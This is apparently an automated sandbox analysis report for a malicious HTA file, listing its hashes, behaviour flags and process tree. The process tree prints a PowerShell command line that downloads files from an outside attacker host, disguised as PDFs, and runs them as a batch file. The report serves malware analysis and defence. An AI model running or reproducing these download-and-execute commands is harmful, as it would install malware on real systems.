Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
27/03/2023, 09:14
Static task
static1
Behavioral task
behavioral1
Sample
doc(1).hta
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
doc(1).hta
Resource
win10v2004-20230221-en
General
-
Target
doc(1).hta
-
Size
863B
-
MD5
2a876878eb744982978d6fc5228b6316
-
SHA1
6d01b2eddc73cda76aa99222f8a300c3ee26719b
-
SHA256
7d574958aa9f19ed8177ed91a0d9a1c0e222fa749046239aee7ff326880ea230
-
SHA512
6f048014b5efaf1ad7a5c3a2242658854650bc251b80941c9ff9e1e8bf99bf4e04b2384476c741f769e5391e3de2b8d441a793fe0dc128ea84719354127ca5de
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 552 powershell.exe 1684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 552 powershell.exe Token: SeDebugPrivilege 1684 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1268 wrote to memory of 1388 1268 mshta.exe 26 PID 1268 wrote to memory of 1388 1268 mshta.exe 26 PID 1268 wrote to memory of 1388 1268 mshta.exe 26 PID 1268 wrote to memory of 1388 1268 mshta.exe 26 PID 1388 wrote to memory of 552 1388 cmd.exe 28 PID 1388 wrote to memory of 552 1388 cmd.exe 28 PID 1388 wrote to memory of 552 1388 cmd.exe 28 PID 1388 wrote to memory of 552 1388 cmd.exe 28 PID 1268 wrote to memory of 596 1268 mshta.exe 29 PID 1268 wrote to memory of 596 1268 mshta.exe 29 PID 1268 wrote to memory of 596 1268 mshta.exe 29 PID 1268 wrote to memory of 596 1268 mshta.exe 29 PID 596 wrote to memory of 1684 596 cmd.exe 31 PID 596 wrote to memory of 1684 596 cmd.exe 31 PID 596 wrote to memory of 1684 596 cmd.exe 31 PID 596 wrote to memory of 1684 596 cmd.exe 31
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\doc(1).hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/z.pdf -OutFile $env:tmp\kim.bat; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\kim.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/z.pdf -OutFile $env:tmp\kim.bat; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\kim.bat3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/b.pdf -OutFile $env:tmp\Note.txt; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\Note.txt2⤵
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri http://shopdataserver4.sytes.net/pdf/b.pdf -OutFile $env:tmp\Note.txt; Start-Sleep -Seconds 5 C:\Users\Admin\AppData\Local\Temp\Note.txt3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\51CWKEOKRQWB8LVY21R6.temp
Filesize7KB
MD540372829434f5ac63cffbd304e62d67b
SHA1789a0c4cc598f3c2290aaf1645346c1b1cea76ef
SHA256981ca88268ac9f88cc3400b75c54522c88da86ce2cb840fb3fa1c871f05c6f68
SHA51264d6dec7ad76d49b61ea9e90c28659554270afaefbdd025a413244527f200dd2cf807e988e8c068ee2b9c9b60683a6cc2466c45fd6afcfe7abe6eb1b71baf9bc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD540372829434f5ac63cffbd304e62d67b
SHA1789a0c4cc598f3c2290aaf1645346c1b1cea76ef
SHA256981ca88268ac9f88cc3400b75c54522c88da86ce2cb840fb3fa1c871f05c6f68
SHA51264d6dec7ad76d49b61ea9e90c28659554270afaefbdd025a413244527f200dd2cf807e988e8c068ee2b9c9b60683a6cc2466c45fd6afcfe7abe6eb1b71baf9bc